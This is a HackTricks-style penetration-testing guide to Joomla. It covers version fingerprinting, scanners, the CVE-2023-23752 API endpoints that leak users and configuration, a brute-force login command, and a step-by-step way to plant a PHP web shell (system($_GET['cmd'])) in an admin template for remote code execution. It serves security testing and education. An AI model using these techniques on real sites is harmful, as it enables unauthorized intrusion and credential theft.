7.0 KiB
		
	
	
	
	
	
	
	
			
		
		
	
	Joomla
{% hint style="success" %}
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:  HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Deepen your expertise in Mobile Security with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
{% embed url="https://academy.8ksec.io/" %}
Joomla Statistics
Joomla collects some anonymous usage statistics such as the breakdown of Joomla, PHP and database versions and server operating systems in use on Joomla installations. This data can be queried via their public API.
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
{
    "data": {
        "cms_version": {
            "3.0": 0,
            "3.1": 0,
            "3.10": 6.33,
            "3.2": 0.01,
            "3.3": 0.02,
            "3.4": 0.05,
            "3.5": 12.24,
            "3.6": 22.85,
            "3.7": 7.99,
            "3.8": 17.72,
            "3.9": 27.24,
            "4.0": 3.21,
            "4.1": 1.53,
            "4.2": 0.82,
            "4.3": 0,
            "5.0": 0
        },
        "total": 2951032
    }
}
Enumeration
Discovery/Footprinting
- Check the meta
curl https://www.joomla.org/ | grep Joomla | grep generator
<meta name="generator" content="Joomla! - Open Source Content Management" />
- robots.txt
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
- README.txt
1- What is this?
	* This is a Joomla! installation/upgrade package to version 3.x
	* Joomla! Official site: https://www.joomla.org
	* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
	* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
Version
- In /administrator/manifests/files/joomla.xml you can see the version.
- In /language/en-GB/en-GB.xml you can get the version of Joomla.
- In plugins/system/cache/cache.xml you can see an approximate version.
Automatic
droopescan scan joomla --url http://joomla-site.local/
In 80,443 - Pentesting Web Methodology is a section about CMS scanners that can scan Joomla.
API Unauthenticated Information Disclosure:
Versions From 4.0.0 to 4.2.7 are vulnerable to Unauthenticated information disclosure (CVE-2023-23752) that will dump creds and other information.
- Users: http://<host>/api/v1/users?public=true
- Config File: http://<host>/api/index.php/v1/config/application?public=true
MSF Module: scanner/http/joomla_api_improper_access_checks or ruby script: 51334
Brute-Force
You can use this script to attempt to brute force the login.
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
 
admin:admin
RCE
If you managed to get admin credentials you can RCE inside of it by adding a snippet of PHP code to gain RCE. We can do this by customizing a template.
- Click on Templateson the bottom left underConfigurationto pull up the templates menu.
- Click on a template name. Let's choose protostarunder theTemplatecolumn header. This will bring us to theTemplates: Customisepage.
- Finally, you can click on a page to pull up the page source. Let's choose the error.phppage. We'll add a PHP one-liner to gain code execution as follows:- system($_GET['cmd']);
 
- Save & Close
- curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
From XSS to RCE
- JoomSploit: Joomla Exploitation Script that elevate XSS to RCE or Others Critical Vulnerabilities. For more info check this post. It provides support for Joomla Versions 5.X.X, 4.X.X, and 3.X.X, and allows to:
- Privilege Escalation: Creates an user in Joomla.
- (RCE) Built-In Templates Edit: Edit a Built-In Templates in Joomla.
- (Custom) Custom Exploits: Custom Exploits for Third-Party Joomla Plugins.
 
Deepen your expertise in Mobile Security with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
{% embed url="https://academy.8ksec.io/" %}
{% hint style="success" %}
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:  HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.